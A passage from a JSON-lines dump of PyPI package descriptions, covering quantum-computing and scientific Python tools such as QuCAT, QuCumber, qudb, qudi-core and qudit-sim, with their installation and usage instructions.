level for statistical test. significance_level = 0.01 by default.\n\n[program_specification]\n;Description: The program specification.\n;Format:input string (binary),output string (binary)=probability\n;Example:\n;00,1=0.5\n;00,0=0.5\n;01,1=0.5\n;01,0=0.5\n;or\n;0-,-=0.5\n;Attention: '-' can refer to both '0' and '1'.A sample configuration file is availablehere.First, you need to activate the conda environment:conda activate qucatSecond, you can write the Python program as follows as an example:from qucat_cover.qucat_run import qucat\nqucat(1,\"/Users/user/qram_sample.ini\", \"\")There are three parameters for qucat method.Functionality, value can be either 1 or 2The root of the configuration fileThe root of the seedrow file. (\"\" represents no seedrow file)After all the preparation, QuCAT will generate test cases your requirement and execute to get results.After running, you get 2 text files. They containTest SuitesTest Outputs and Assessment ResultsVideo DemonstrationA video demo is availablehere.ExtensionOne can checkout the code from GitHub and provide extensions to QuCAT."} +{"package": "qucat-cover-gpu", "pacakge-description": "QuCAT: A Combinatorial Testing Tool for Quantum SoftwareDescriptionWith the increased developments in quantum computing, the availability of systematic and automatic testing approaches for quantum programs is becoming more and more essential. To this end, we present the quantum software testing tool QuCAT for combinatorial testing of quantum programs. QuCAT provides two functionalities of use. With the first functionality, the tool generates a test suite of a given strength (e.g., pair-wise). With the second functionality, it generates test suites with increasing strength until a failure is triggered or a maximum strength is reached. QuCAT uses two test oracles to check the correctness of test outputs. We assess the cost and effectiveness of QuCAT with 3 faulty versions of 5 quantum programs. Results show that combinatorial test suites with a low strength can find faults with limited cost, while a higher strength performs better to trigger some difficult faults with relatively higher cost.InstallationInstall Anaconda. You can download Anaconda for your OS fromhttps://www.anaconda.com/Install PICT. 
You can download PICT for your OS fromhttps://github.com/Microsoft/pictIf you add it into system variable, you don't need to specify PICT root in the configuration file introduced laterCreate a conda environment (e.g., with name \"qucat\"):conda create -n qucat python=3.9Activate the environment and install Qiskit and rpy2conda activate qucat\npip install qucat-cover-gpuHow to use QuCAT?Quantum Program FileThe quantum program should be written with Qiskit.The code has to be structured in a function named as 'run' with one parameter that refers to the quantum circuit.Users only need to add gates to the circuit and measure output qubits to get the output. They don't need to set any register, initialize circuits, choose the simulation, or execute the circuits in 'run' function.A sample quantum program is availablehere.Configuration FileThe configuration file should be written in an INI file.\nThe configuration file is described below.[program]\nroot= \n;(Required)\n;Description: The absolute root of your quantum program file.\nnum_qubit= \n;(Required)\n;Description: The total number of qubit of your quantum program.\ninputID= \n;(Required)\n;Description: The IDs of input qubits.\n;Format: A non-repeating sequence separated by commas.\noutputID= \n;(Required)\n;Description: The IDs of output qubits which are the qubits to be measured.\n;Format: A non-repeating sequence separated by commas\n\n[qucat_configuration]\npict_root=\n;(Optional)\n;Description: The absolute root to run pict. If the root is added to system variable, users don't need to specify it. pict_root='.' by default.\nk=\n;(Optional)\n;Description: Order of combinations. In Functionality Two, it refers to the maximum value of strength. o = 2 by default. \nsignificance_level=\n;(Optional)\n;Description: The significance level for statistical test. significance_level = 0.01 by default.\n\n[program_specification]\n;Description: The program specification.\n;Format:input string (binary),output string (binary)=probability\n;Example:\n;00,1=0.5\n;00,0=0.5\n;01,1=0.5\n;01,0=0.5\n;or\n;0-,-=0.5\n;Attention: '-' can refer to both '0' and '1'.A sample configuration file is availablehere.First, you need to activate the conda environment:conda activate qucatSecond, you can write the Python program as follows as an example:from qucat_cover.qucat_run import qucat\nqucat(1,\"/Users/user/qram_sample.ini\", \"\")There are three parameters for qucat method.Functionality, value can be either 1 or 2The root of the configuration fileThe root of the seedrow file. (\"\" represents no seedrow file)After all the preparation, QuCAT will generate test cases your requirement and execute to get results.After running, you get 2 text files. 
They containTest SuitesTest Outputs and Assessment ResultsVideo DemonstrationA video demo is availablehere.ExtensionOne can checkout the code from GitHub and provide extensions to QuCAT."} +{"package": "qucircuit", "pacakge-description": "Qucircuit \u2013 A quantum computing circuits simulatorRelease 2.2$ pip install qucircuitNow full support for quantum noise simulation.Includes state-vector and density-matrix based simulator backends.'Getting started' tutorial Jupyter notebooks, and documentation resources -Getting started tutorial Jupyter notebookGetting started with noise simulation tutorial Jupyter notebookExample implementations of various quantum algorithmsDeveloper documentation"} +{"package": "qucochemistry", "pacakge-description": "TheQu & Co Chemistrypackage is an open source library (licensed under Apache 2) for compiling and running quantum chemistry algorithms on Rigetti\u2019s Forest quantum computing platform.InstallationTo start using Qu & Co Chemistry library, you need to first install the Rigetti\u2019sForest SDKwhich contains both the Quantum Virtual Machine and the Rigetti\u2019s quantum compiler.You can install the library in two different ways.From PyPi or condaUsing pip install the latest version from PyPi within a virtual environment:python-mpipinstallqucochemistryAlternatively, the library can be installed within a conda environment:condainstall-cqucoqucochemistryFrom sourceUsing pip, install the library within a virtual environment:python-mpipinstall-rdeploy/requirements.txtpython-mpipinstall-e.Alternatively, install within a Conda environment using the provided environment:condaenvcreate-n-fdeploy/environment.ymlcondaactivatepython-mpipinstall-e.UsageIn order to use this library within your program, Rigetti\u2019s quantum virtual machine and quantum compilers must be running in the background.\nIf you run on Linux or OSX and the Rigetti\u2019sForest SDKis correctly installed, you can start them in the\nbackground with the following commands:screen-dm-Sqvmqvm-Sscreen-dm-Squilcquilc-SOn Windows just executeqvm -Sandquilc -Scommands in two separate cmd terminals.For more details on how to use the library, several tutorials on Jupyter notebook are availablehere.\nTo be able run end-to-end programs, you should install PySCF and OpenFermion-PySCF as additional dependencies with pip:python-mpipinstallopenfermionpyscfpyscfIf you created the Conda environment as described in the previous section, you should be able to install these dependencies within\nthe environment with the same command.With Docker containerThe library can also be used in Jupyter notebooks hosted within a Docker container. You should have bothdockeranddocker-composeinstalled in your system.To setup the Docker environment in the project root directory run:docker-composeup-dNow you can access a Jupyter notebook in your browser athttp://127.0.0.1:8888with Qu&Co Chemistry library available. Navigate to theexamples/folder to run the tutorial notebooks.DevelopmentThe unit tests are built using thepytestframework. In order to run them, install the qucochemistry package using the previous instruction\nand add the following dependencies:# for Conda environmentcondainstallpytestpytest-cov# for standard virtual environmentpython-mpipinstallpytestpytest-covThe tests can be executed in the root project directory as follows:pytest-v--cov=qucochemistryAn automatic code coverage report will be generated after running the above command. 
In order to visualize\nthe details of the code coverage for each module, an HTML report can be generated and rendered with your favorite\nbrowserpytest-v--cov=qucochemistry--cov-reporthtmlfirefoxhtmlcov/index.htmlHow to contributeWe\u2019d love to accept your contributions and patches to Qu & Co Chemistry.\nThere are a few guidelines you need to follow.\nContributions to Qu & Co Chemistry must be accompanied by a Contributor License Agreement.\nYou (or your employer) retain the copyright to your contribution,\nthis simply gives us permission to use and redistribute your contributions as part of the project.All submissions, including submissions by project members, require review.\nWe use GitHub pull requests for this purpose. ConsultGitHub Helpfor\nmore information on using pull requests.\nFurthermore, please make sure your new code comes with extensive tests!\nWe use automatic testing to make sure all pull requests pass tests and do not\ndecrease overall test coverage by too much. Make sure you adhere to our style\nguide. Just have a look at our code for clues. We mostly followPEP 8and use\nthe correspondinglinterto check for it.\nCode should always come with documentation.AuthorsVincent Elfving(Qu & Co B.V.)We are happy to include future contributors as authors on later Qu & Co Chemistry releases.DisclaimerCopyright 2019"} +{"package": "qucode", "pacakge-description": "No description available on PyPI."} +{"package": "qucs2gerber", "pacakge-description": "#qucs2gerber PackageInstallation:python3 -m pip install --user qucs2gerberUsage:python3 -m qucs2gerber -s qucs_schematic.sch -o gerber_file.grbProject Website:qucs2gerber GitHub Project"} +{"package": "qucs-netlist", "pacakge-description": "qucs-netlistThe Python package can be found herehttps://pypi.org/and can be installed with\npip install qucs-netlist==0.0.5Converts Qucs schematic files into a form suitable for a PCB design application. It uses a Qucs schematic file to add components to a netlist file. If there is also a Qucs .sim file with the same name but the .sim extension, it will use that to create the nets, if not it will attempt to run Qucs to create a .sim file, if Qucs has been installed that should succeed, but it won't work from qucs-s. If no .sim file was present and can't be created, the output netlist file will contain components but no nets.INSTALLATION\nAssuming your system already has Python3 and PIP installed, type:\npython3 -m pip install PopoutApps-qucs-netlistRUNNING\nTo process a schematic file in your current directory, type:\npython3 -m PopoutApps.qucs-netlist mycircuit.schThe output file will be called mycircuit.netIf you run it again it will not overwrite the existing file, unless you add a 'y' at the end of the line:\npython3 -m PopoutApps.qucs-netlist mycircuit.schERRORS\nThe program will print a warning line for each component which is not yet in the reference data file:\nWarning: Unknown component type not converted: D2 DiacThe program may call a qucs process which produces many lines (100+) of errors in the terminal. They are mostly to do with missing fonts and don't affect the output file. Ignore these.SCOPE\nThere is a maximum 100 components.\nThe exported file can be imported by DIY Layout Creator (available from their website or from Flathub) and VeroRoute, but it could be imported into any application provided it accepted the component types in the reference data file. 
Alternatively another .dat file could be provided with component names acceptable to the application."} +{"package": "qucumber", "pacakge-description": "A Quantum Calculator Used for Many-body Eigenstate ReconstructionQuCumber is a program that reconstructs an unknown quantum wavefunction\nfrom a set of measurements. The measurements should consist of binary counts;\nfor example, the occupation of an atomic orbital, or angular momentum eigenvalue of\na qubit. These measurements form a training set, which is used to train a\nstochastic neural network called a Restricted Boltzmann Machine. Once trained, the\nneural network is a reconstructed representation of the unknown wavefunction\nunderlying the measurement data. It can be used for generative modelling, i.e.\nproducing new instances of measurements, and to calculate estimators not\ncontained in the original data set.QuCumber is developed by the Perimeter Institute Quantum Intelligence Lab (PIQuIL).FeaturesQuCumber implements unsupervised generative modelling with a two-layer RBM.\nEach layer is a number of binary stochastic variables (with values 0 or 1). The\nsize of the visible layer corresponds to the input data, i.e. the number of\nqubits. The size of the hidden layer is a hyperparameter, varied to systematically control\nrepresentation error.Currently, quantum state reconstruction/tomography can be performed on both pure and mixed states.\nPure state reconstruction can be further broken down into positive or complex wavefunction reconstruction.\nIn the case of a positive wavefunction, data is only required in one basis. For complex wavefunctions as\nwell as mixed states, measurement data in additional bases will be required to train the state.DocumentationDocumentation can be foundhere.See \"QuCumber: wavefunction reconstruction with neural networks\"https://scipost.org/SciPostPhys.7.1.009Getting StartedThese instructions will get you a copy of the project up and running on your\nlocal machine for development and testing purposes.InstallingIf you're on Windows, you will have to install PyTorch manually; instructions\ncan be found on their website:pytorch.org.You can install the latest stable version of QuCumber, along with its dependencies,\nusingpip:pipinstallqucumberIf, for some reason,pipfails to install PyTorch, you can find installation\ninstructions on their website. Once that's done you should be able to install\nQuCumber throughpipas above.QuCumber supports Python 3.6 and newer stable versions.Installing the bleeding-edge versionIf you'd like to install the most upto date, but potentially unstable version,\nyou can clone the repository's master branch and then build from source like so:gitclonegit@github.com:PIQuIL/QuCumber.gitcd./QuCumber\npythonsetup.pyinstallContributingPlease readCONTRIBUTING.mdfor details on how to contribute\nto the project, and the process for submitting pull requests to us.LicenseQuCumber is licensed under the Apache License Version 2.0, this includes almost\nall files in this repo. However, some miscellaneous files may be licensed\ndifferently. SeeLICENSEfor more details.Citation@Article{10.21468/SciPostPhys.7.1.009,\n title={{QuCumber: wavefunction reconstruction with neural networks}},\n author={Matthew J. S. Beach and Isaac De Vlugt and Anna Golubeva and Patrick Huembeli and Bohdan Kulchytskyy and Xiuzhe Luo and Roger G. 
Melko and Ejaaz Merali and Giacomo Torlai},\n journal={SciPost Phys.},\n volume={7},\n issue={1},\n pages={9},\n year={2019},\n publisher={SciPost},\n doi={10.21468/SciPostPhys.7.1.009},\n url={https://scipost.org/10.21468/SciPostPhys.7.1.009},}AcknowledgmentsWe thank M. Albergo, G. Carleo, J. Carrasquilla, D. Sehayek, and\nL. Hayward Sierens for many helpful discussions.We thank thePerimeter Institutefor the\ncontinuing support of PIQuIL.Thanks to Nick Mercer for creating our awesome logo. You can check out more of\nNick's work by visitinghis portfolioon Behance!"} +{"package": "qudb", "pacakge-description": "Manage a database of questions and use it to generate assessments, e.g.\nassignments, quizzes, and exams.qudbis a personal question bank for instructors. It allows you to:Manage your collection of questions for a given course, and assemble\nvarious assessments out of them.Track how you are using your questions. Query your database forquestions,terms,assessments, orassessment types.Anassessment typerefers to a type of assessments that recur at\nmost once every term, such asquiz1,assignment2, andfinal. It\ncan be any arbitrary string identifying a type of assessment. Anassessmentis a specific occurrence of anassessment typein a\ngiventerm, and hence is identified by a pair of atermand anassessment type.Example queries:In which assessments has a given question been used?What questions make up a given assessment?What questions have been used in a given term?What questions have been used in final exams across all terms?Use a template to render an assessment document using its questions.Distinguish between essay questions (default) and multiple-choice\nquestions.Use arbitrary additional variables in your templates, so you can use\nthe same templates across courses by introducing, for example, an\nadditionalcourse namevariable.Getting StartedCreate a database:qm initBy default, this command creates a./qu.dbdatabase file. Use the-D(or--database) option to specify the database file\nlocation.Add questions to assessments (an assessment is identified by atermand anassessment type):qm add --term 151 --assessment-type quiz1 questions/chapter1/whats-your-name.tex\nqm add --term 151 --assessment-type quiz1 questions/chapter1/mcq/choose-a-month.texUse the-Q(or--questions-directory) option to specify where\nto look for the question files. You can also specify a question\u2019spoints(-p), whether it\u2019s abonusquestion (-b), and itsorderin the assessment (-o) if you want to insert it somewhere\nin the middle. Thepoints,bonus, andorderfields of a\nquestion are per assessment, and can change from one assessment to\nanother.Generate an assessment:qm render --term 151 --assessment-type quiz1 --pdflatex quiz-template.texThe--pdflatexoption (or-P) assumes that your template is a\nLaTeX file, requires thepdflatexprogram, and generates a PDF.\nWithout it, you get a rendered template.The--configoption (or-C) allows specifying additional\narbitrary template variables using anINI-style configuration\nfile.CommandsAlthough theinit,add, andrendercommands described above\nare often enough, there are a few other commands that complement them.\nMoreover, these three commands have a few options that control their\noperation. Here are all the supported commands and their options.initusage: qm init [-h] [-D DATABASE]\n\nCreate a new database file as specified by the -D option. 
Defaults to ./qu.db.\nIf the database exists, do nothing\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file pathlistusage: qm list [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] [-t TERM]\n [-y ASSESSMENT_TYPE] [-q QUESTION] [-m]\n {terms,assessment-types,assessments,questions}\n\nList existing entities: terms, assessment-types, assessments, or questions\n\npositional arguments:\n {terms,assessment-types,assessments,questions}\n what to list\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. Question paths stored in\n the database are relative to this path\n -t TERM, --term TERM academic semester code, e.g. 142\n -y ASSESSMENT_TYPE, --assessment-type ASSESSMENT_TYPE\n examples: major1, assignment2, quiz3\n -q QUESTION, --question QUESTION\n include results related to this question only\n -m, --mcq whether to retrieve MCQs or non-MCQs. cannot retrieve\n both at onceaddusage: qm add [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] -t TERM -y\n ASSESSMENT_TYPE [-b] [-p POINTS] [-o ORDER] [-d DATE]\n question\n\nAdd a question file to a given assessment, specified by a term and an\nassessment-type (required options)\n\npositional arguments:\n question path to the question file\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. Question paths stored in\n the database are relative to this path\n -t TERM, --term TERM academic semester (3 digits)\n -y ASSESSMENT_TYPE, --assessment-type ASSESSMENT_TYPE\n examples: major1, assignment2, quiz3\n -b, --bonus this is a bonus question\n -p POINTS, --points POINTS\n default points for question\n -o ORDER, --order ORDER\n the order of the question in this assessment; defaults\n to last\n -d DATE, --date DATE assessment date; format YYYY-MM-DDupdateusage: qm update [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] -t TERM -y\n ASSESSMENT_TYPE [-b] [-p POINTS] [-o ORDER] [-d DATE]\n question\n\nUpdate an existing assessment or question\n\npositional arguments:\n question path to the question file\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. Question paths stored in\n the database are relative to this path\n -t TERM, --term TERM academic semester (3 digits)\n -y ASSESSMENT_TYPE, --assessment-type ASSESSMENT_TYPE\n examples: major1, assignment2, quiz3\n -b, --bonus this is a bonus question\n -p POINTS, --points POINTS\n default points for question\n -o ORDER, --order ORDER\n the order of the question in this assessment; defaults\n to last\n -d DATE, --date DATE assessment date; format YYYY-MM-DDremove(orrm)usage: qm remove [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] -t TERM -y\n ASSESSMENT_TYPE\n\nRemove a question from an assessment\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. 
Question paths stored in\n the database are relative to this path\n -t TERM, --term TERM academic semester (3 digits)\n -y ASSESSMENT_TYPE, --assessment-type ASSESSMENT_TYPE\n examples: major1, assignment2, quiz3renderusage: qm render [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] -t TERM -y\n ASSESSMENT_TYPE [-O OUTPUT_DIRECTORY] [-C CONFIG] [-P]\n [-l MATERIAL]\n template\n\nGenerate assessment documents using the specified template. Two documents are\ngenerated: TERM-ASSESSMENT_TYPE.tex and TERM-ASSESSMENT_TYPE-solution.tex,\nwith the template variable \"solution\" set to False and True, respectively.\nTemplates are rendered using the Jinja2 template engine, with the following\ndelimiters: <% block %><% endblock %>, << variable >>, <# comment #>\n\npositional arguments:\n template path to the jinja2 template file\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. Question paths stored in\n the database are relative to this path\n -t TERM, --term TERM academic semester (3 digits)\n -y ASSESSMENT_TYPE, --assessment-type ASSESSMENT_TYPE\n examples: major1, assignment2, quiz3\n -O OUTPUT_DIRECTORY, --output-directory OUTPUT_DIRECTORY\n the directory in which the rendered files will be\n saved\n -C CONFIG, --config CONFIG\n ini-style configuration file defining additional\n template variables. (Use section [templates])\n -P, --pdflatex process rendered file with pdflatex (4 runs)\n -l MATERIAL, --material MATERIAL\n specify the material to which this assessment\n pertains. Available to the template in the \"material\"\n variableexportusage: qm export [-h] [-D DATABASE] [--overwrite] file\n\nExport the database to a YAML file (does not include the contents of question\nfiles)\n\npositional arguments:\n file YAML file to export to\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n --overwrite overwrite the file if it already existsimportusage: qm import [-h] [-D DATABASE] [-Q QUESTIONS_DIRECTORY] [-u] file\n\nImport data from a YAML file into the database. To learn the YAML schema,\nexport a minimal database, or see the README.md file\n\npositional arguments:\n file YAML file to import\n\noptional arguments:\n -h, --help show this help message and exit\n -D DATABASE, --database DATABASE\n SQLite database file path\n -Q QUESTIONS_DIRECTORY, --questions-directory QUESTIONS_DIRECTORY\n where to look for questions. Question paths stored in\n the database are relative to this path\n -u, --update ignore existing, identical questionsExample valid YAML data:'142':# term codequiz1:# assessment type: creates an assessment in the parent term-file:questions/chapter1/q1.tex# each item in the list is a question-file:questions/chapter2/q5.tex# file: the file containing the question textdate:2015-02-14# a date in any question sets the assessment date-bonus:true# set this question as a bonus questionfile:questions/chapter2/arm-gcc.texpoints:20# how many points are assigned to this question in this assessmentquiz2:# another assessment in the same term-date:2015-03-07file:questions/chapter3/q2.tex-file:questions/chapter3/q3.texpoints:20'151':# another termquiz1:# this is a different assessment from the previous quiz1,# because it belongs to a different term-file:questions/chapter6/q3.texTemplatesTemplates use theJinja2template\nlanguage. 
Therendercommand requires the--termand--assessment-typeoptions to specify anassessment. The following\nassessment variables are available in the template:term: the term of the specified assessment.title: assessment title, based on its type. For example,quiz1results in the titleQuiz 1, andmajor1results in the titleMajor Exam 1.date: assessment date, as specified using the--dateoption\nof theaddandupdatecommands.solution(Boolean): whether we are rendering the solution.qs: an ordered list of question objects belonging to this\nassessment. Includes the following fields:question.file: path of the question file.points: question points.bonus(Boolean): whether this is a bonus question.mcqs: an ordered list of multiple-choice question objects,\notherwise similar toqs.questions_relpath: the relative path from the current directory\nto the questions as specified by the-Q/--questions-directoryoption.Variables can be referenced in the template by enclosing them in<>. For example,<< title >>renders the assessment\u2019stitle.To use some basic logic in the template, use template statements, such\nasforloops orifconditionals, by enclosing them in<%and%>. For example:<% for q in qs %>\n <% if q.bonus %>\n \\bonusquestion\n <% else %>\n \\question\n <% endif %>\n <% if q.points %>[<< q.points >>]<% endif %>\n \\input{<< questions_relpath >>/<< q.question.file >>}\n<% endfor %>For information about the template language, consult theJinja2\nTemplate Designer\nDocumentation.AssumptionsOneSQLitedatabase file per course.Questions and templates are text files.Multiple choice questions have an/mcq/component in their paths.Each question file includes the question\u2019s solution in a way that\nallows it to be easily listed or omitted in a template.Although it is not required,qudbworks well with theexamLaTeX package. For example,\neach question file can wrap the solution in asolutionenvironment, then the template can easily include or exclude the\nsolution based on the value of thesolutiontemplate variable as\nfollows:<% if solution %>\n\\printanswers\n<% endif %>LicenseBSD (2-clause)."} +{"package": "qudi-core", "pacakge-description": "qudi-coreThe qudi-core repository represents the base installation for thequdiPython package.It provides a versatile framework for modular multi-instrument and multi-computer measurement\napplications.\nIt enables scientists and engineers to easily develop specialized multithreaded graphical or\nnon-graphical applications.Most of the more technical details about a complex measurement suite are handled automatically byqudiso the developer can focus on what matters most... the measurement control logic and the\noptional graphical user interface.An incomplete list of functionalityqudiprovides:loggingthread managementautomatic app status dumping/loadingruntime resource managementbase modules for hardware interfaces, measurement logics and graphical user interfacesinter-module communicationsupport for installablequdinamespace package addonsinteractive local IPython kernel interfacehigh-level automation framework via tasks/scriptsmeasurement setup configuration via YAML config filevarious tooling as a Python librarybasic data storage facility...AttributionIf you are publishing any work based on using qudi as a framework/tool it is good practice to\nmention the qudi project, e.g. 
in the methods description.Even better, you could simply cite our initial publication about qudi:Qudi: A modular python suite for experiment control and data processingThe qudi contributors will appreciate this and it helps our open-source community to gain attention.\nThis will hopefully attract more people willing to help in improving the qudi project which in turn\nbenefits everyone using this software.Thank you!InstallationFor installation instructions please refer to ourqudi installation guide.DocumentationThe official qudi documentation homepage can be foundhere.ForumFor questions concerning qudi on any level, there is aforumto discuss with the qudi community. Feel free to ask!\nIf you found a bug and located it already, please note GitHub'sissue trackingfeature.ContributingYou want to contribute to the qudi project? Great! Please start by reading through ourcontributing guideline.To file a bug report or feature request please open anissue on GitHub.To contribute source code to the qudi-core repository please open apull request on GitHub.Issuesandpull requestsshould be discussed openly in their\nrespective comment sections on GitHub.For any other development-related questions or discussions please subscribe to and use ourqudi-dev mailing list. Please also consider usinggiststo showcase and discuss topics publicly within the qudi community.News and UpdatesWe will occasionally inform the qudi community about releases and breaking changes (no discussions).If you are using qudi and want to stay in the loop, please subscribe to ourqudi-announce mailing list.LicenseQudi is licensed under theGNU Lesser General Public License Version 3 (LGPL v3).A copy of the full license text can be found in the repository root directory inLICENSEandLICENSE.LESSERFor more information please check thelicense section in the qudi documentation.CopyrightCheckAUTHORS.mdfor a list of authors and the git history for their individual\ncontributions."} +{"package": "qudida", "pacakge-description": "QuDiDA (QUick and DIrty Domain Adaptation)QuDiDA is a micro library for very naive though quick pixel level image domain adaptation viascikit-learntransformers.\nIs assumed to be used as image augmentation technique, while was not tested in public benchmarks.Installationpip install qudidaorpip install git+https://github.com/arsenyinfo/qudidaUsageimport cv2\n\nfrom sklearn.decomposition import PCA\nfrom qudida import DomainAdapter\n\nadapter = DomainAdapter(transformer=PCA(n_components=1), ref_img=cv2.imread('target.png'))\nsource = cv2.imread('source.png')\nresult = adapter(source)\ncv2.imwrite('../result.png', result)ExampleSource image:Target image (style donor):Result with various adaptations:"} +{"package": "qudi-hira-analysis", "pacakge-description": "Qudi Hira AnalysisAnalytics suite for qubit SPM using FPGA timetaggersInstallationpipinstallqudi-hira-analysisUpdate to latest versionpipinstall--upgradequdi-hira-analysisCitationIf you are publishing scientific results that use this code, as good scientific practice you\nshould citethis work.FeaturesAutomated data import and handlingWorks natively with data fromQudiandQudi-HiraFast and robust curve fitting for NV-ODMR 2D maps, Autocorrelation, Rabi, Ramsey, T1, T2 and more...Supports all file formats used in NV magnetometry, AFM, MFM and NV-SPMUses a Dataclass-centered design for easy access to data and metadataUsagefrompathlibimportPathimportseabornassnsfromqudi_hira_analysisimportDataHandlerdh=DataHandler(data_folder=Path(\"C:/Data\"),# Path to data 
folderfigure_folder=Path(\"C:/QudiHiraAnalysis\"),# Path to figure foldermeasurement_folder=Path(\"20230101_NV1\")# Measurement folder name (optional))# Lazy-load all pulsed measurements with \"odmr\" in the path into a Dataclassodmr_measurements=dh.load_measurements(\"odmr\",pulsed=True)# Fit ODMR data with a double Lorentzianodmr=odmr_measurements[\"20230101-0420-00\"]x_fit,y_fit,result=dh.fit(x=\"Controlled variable(Hz)\",y=\"Signal\",fit_function=dh.fit_function.lorentziandouble,data=odmr.data)# Plot the data and the fitax=sns.scatterplot(x=\"Controlled variable(Hz)\",y=\"Signal\",data=odmr.data,label=\"Data\")sns.lineplot(x=x_fit,y=y_fit,ax=ax,label=\"Fit\")# Calculate the ODMR splittingax.axvline(result.best_values[\"l0_center\"],ls=\"--\",color=\"C1\")ax.axvline(result.best_values[\"l1_center\"],ls=\"--\",color=\"C1\")splitting=result.best_values[\"l1_center\"]-result.best_values[\"l0_center\"]ax.set_title(f\"ODMR splitting ={splitting/1e6:.1f}MHz\")# Generate fit reportprint(result.fit_report())# Save figuredh.save_figures(filepath=Path(\"odmr_fit\"),fig=ax.get_figure())DocumentationThe full documentation is availablehere.SchemaOverallflowchart TD\n IOHandler <-- Handle IO operations --> DataLoader;\n DataLoader <-- Map IO callables --> DataHandler;\n Qudi[Qudi FitLogic] --> AnalysisLogic;\n AnalysisLogic -- Inject fit functions --> DataHandler;\n DataHandler -- Fit data --> Plot;\n DataHandler -- Structure data --> MeasurementDataclass;\n MeasurementDataclass -- Plot data --> Plot[JupyterLab Notebook];\n Plot -- Save plotted data --> DataHandler;\n style MeasurementDataclass fill: #bbf, stroke: #f66, stroke-width: 2px, color: #fff, stroke-dasharray: 5 5Dataclassflowchart LR\n subgraph Standard Data\n MeasurementDataclass --o filepath1[filepath: Path];\n MeasurementDataclass --o data1[data: DataFrame];\n MeasurementDataclass --o params1[params: dict];\n MeasurementDataclass --o timestamp1[timestamp: datetime.datetime];\n MeasurementDataclass --o methods1[get_param_from_filename: Callable];\n MeasurementDataclass --o methods2[set_datetime_index: Callable];\n end\n subgraph Pulsed Data\n MeasurementDataclass -- pulsed --> PulsedMeasurementDataclass;\n PulsedMeasurementDataclass -- measurement --> PulsedMeasurement;\n PulsedMeasurement --o filepath2[filepath: Path];\n PulsedMeasurement --o data2[data: DataFrame];\n PulsedMeasurement --o params2[params: dict];\n PulsedMeasurementDataclass -- laser_pulses --> LaserPulses;\n LaserPulses --o filepath3[filepath: Path];\n LaserPulses --o data3[data: DataFrame];\n LaserPulses --o params3[params: dict];\n PulsedMeasurementDataclass -- timetrace --> RawTimetrace;\n RawTimetrace --o filepath4[filepath: Path];\n RawTimetrace --o data4[data: DataFrame];\n RawTimetrace --o params4[params: dict];\n endLicenseThis license of this project is located in the top level folder underLICENSE. 
Some specific files contain their\nindividual licenses in the file header docstring.BuildPrerequisitesPoetrygitClone repo, install deps and add environment to Jupytergitclonehttps://github.com/dineshpinto/qudi-hira-analysis.gitcdqudi-hira-analysis\npoetryinstall\npoetryrunpython-mipykernelinstall--user--name=qudi-hira-analysis\npoetryrunjupyterlabMakefileThe Makefile located innotebooks/is configured to generate a variety of outputs:make pdf: Converts all notebooks to PDF (requires LaTeX backend)make html: Converts all notebooks to HTMLmake py: Converts all notebooks to Python (can be useful for VCS)make all: Sequentially runs all the notebooks in folderTo use themakecommand on Windows you can installChocolatey, then\ninstall make withchoco install make"} +{"package": "qudi-iqo-modules", "pacakge-description": "qudi-iqo-modulesA collection of qudi measurement modules originally developed for experiments on color centers in\nsemiconductor materials.InstallationFor installation instructions please refer to ouriqo-modules installation guide.More informationThe best starting point for further researching the qudi documentation is thereadme fileof the qudi-core repo.ForumFor questions concerning qudi or the iqo-modules, there is aforumto discuss with the qudi community. Feel free to ask!\nIf you found a bug and located it already, please note GitHub'sissue trackingfeature.CopyrightCheckAUTHORS.mdfor a list of authors and the git history for their individual\ncontributions."} +{"package": "qudit-sim", "pacakge-description": "qudit-sim: Qudit pulse simulation and effective Hamiltonian analysisY. Iiyamaqudit-simis a tool for extracting effective Hamiltonians / gate unitaries of arbitrary microwave pulses applied to a system of statically coupled d-level quantum oscillators (qudits). Its intended usage is as a base for prototyping new pulse sequences that implement custom quantum gates involving more than two oscillator levels.Most of the heavy-lifting is done byQuTiPthrough its Schrodinger equation solver (sesolve). The main functions of this tool are to prepare the Hamiltonian object passed tosesolvefrom the input parameters, and to interpret the result of the simulation.As the focus of the tool is on prototyping rather than performing an accurate simulation, the tool currently assumes a simple model of the system. In particular, incoherent effects (qudit relaxation, depolarization, etc.) 
are not considered.InstallationMost recent tagged versions are available in PyPI.pip install qudit-simTo install from source,git clone https://github.com/UTokyo-ICEPP/qudit-sim\ncd qudit-sim\npip install .RequirementsExact versions of the required packages have not been checked, but reasonably recent versions should do.numpyscipyqutiph5pymatplotlibjax: If using the fidelity maximization (default) method for the effective Hamiltonian extractionoptax: If using the fidelity maximization (default) method for the effective Hamiltonian extractionrqutilsDocumentation and examplesThe documentation including the mathematical background of the simulation and effective Hamiltonian extraction is available atRead the Docs.Example analyses using qudit-sim are available as notebooks in theexamplesdirectory.ContributeYou are most welcome to contribute to qudit-sim development by either forking this repository and sending pull requests or filing bug reports / suggestions for improvement at theissues page."} +{"package": "qudo-quantipy", "pacakge-description": "No description available on PyPI."} +{"package": "qudotpy", "pacakge-description": "QuDotPy=======A quantum computing library written in Python. Exploring quantum computing has never been easier. With QuDotPy you canexperiment with single-qubit operations and gates. You can build multiple-qubit states and perform measurements, and finally you 